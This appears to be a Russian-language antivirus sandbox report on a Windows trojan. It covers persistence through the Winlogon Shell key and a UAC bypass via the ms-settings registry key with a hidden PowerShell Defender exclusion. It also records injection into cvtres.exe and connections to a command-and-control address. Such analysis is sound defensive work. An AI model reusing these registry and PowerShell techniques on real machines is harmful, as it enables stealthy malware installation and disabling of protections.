Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [<HKCU>\Software\Microsoft\Windows NT\CurrentVersion\Winlogon] 'Shell' = 'explorer.exe, %LOCALAPPDATA%\hDesk\hDesk.exe'
- [<HKCU>\Software\Classes\ms-settings\shell\open\command] '' = 'powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath '%LOCALAPPDATA%\hDe...
Вредоносные функции
Внедряет код в
следующие системные процессы:
- %WINDIR%\microsoft.net\framework\v4.0.30319\cvtres.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\build.exe
- %LOCALAPPDATA%\hdesk\hdesk.exe
- %APPDATA%\temp0923
Сетевая активность
Подключается к
- '89.##8.103.191':8081
- 'ip##fo.io':80
TCP
Запросы HTTP GET
- http://ip##fo.io/ip
Другие
- '89.##8.103.191':8081
UDP
- DNS ASK ip##fo.io
Другое
Ищет следующие окна
- ClassName: 'Progman' WindowName: ''
- ClassName: 'Proxy Desktop' WindowName: ''
- ClassName: 'SystemTray_Main' WindowName: ''
- ClassName: 'Media Center Tray Applet' WindowName: ''
- ClassName: '' WindowName: 'View Available Networks'
- ClassName: 'BluetoothNotificationAreaIconWindowClass' WindowName: 'BluetoothNotificationAreaIconWindowClass'
- ClassName: 'BluetoothNotificationAreaIconWindowClass' WindowName: ''
Создает и запускает на исполнение
- '%TEMP%\build.exe'
- '%WINDIR%\microsoft.net\framework\v4.0.30319\cvtres.exe' installs_COBA 89.208.103.191 8081 ehljcYHFU' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\explorer.exe'
- '<SYSTEM32>\ctfmon.exe'
- '%WINDIR%\microsoft.net\framework\v4.0.30319\cvtres.exe' installs_COBA 89.208.103.191 8081 ehljcYHFU
- '%WINDIR%\syswow64\computerdefaults.exe'
